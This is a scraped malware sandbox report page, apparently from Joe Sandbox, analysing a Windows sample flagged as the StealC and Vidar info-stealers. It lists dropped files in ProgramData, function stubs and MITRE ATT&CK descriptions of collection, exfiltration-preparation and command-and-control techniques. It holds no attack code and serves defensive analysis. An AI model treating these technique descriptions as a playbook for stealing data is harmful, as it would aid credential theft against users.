Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\BFBFBFIIJDAKECAKKJEHCFIJKK

C:\ProgramData\DHCFIDAK

C:\ProgramData\ECGHCBGC

C:\ProgramData\EHJJKFCBGIDGHIECGCBKFHIEBG

C:\ProgramData\FHJKKECFIECAKECAFBGC

C:\ProgramData\JJDGCGHCGHCBFHJJKKJE

C:\ProgramData\KJDGIJECFIEBFIDHCGHD

C:\ProgramData\KJDGIJECFIEBFIDHCGHDHIEBAK

C:\ProgramData\KKJKKJJKJEGIECAKJJEBFBAKKE

C:\ProgramData\freebl3.dll

C:\ProgramData\mozglue.dll

C:\ProgramData\msvcp140.dll

Windows Analysis Report
file.exe

Function 00939860 Relevance: 73.7, APIs: 33, Strings: 9, Instructions: 212
libraryloaderCOMMON

Function 009245C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Function 0092BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Function 6C6535A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Function 00934910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Function 00924880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479
networkstringfileCOMMON

Function 00939C10 Relevance: 228.2, APIs: 112, Strings: 18, Instructions: 684
libraryloaderCOMMON

Function 00927710 Relevance: 100.3, APIs: 54, Strings: 3, Instructions: 584
stringmemoryCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre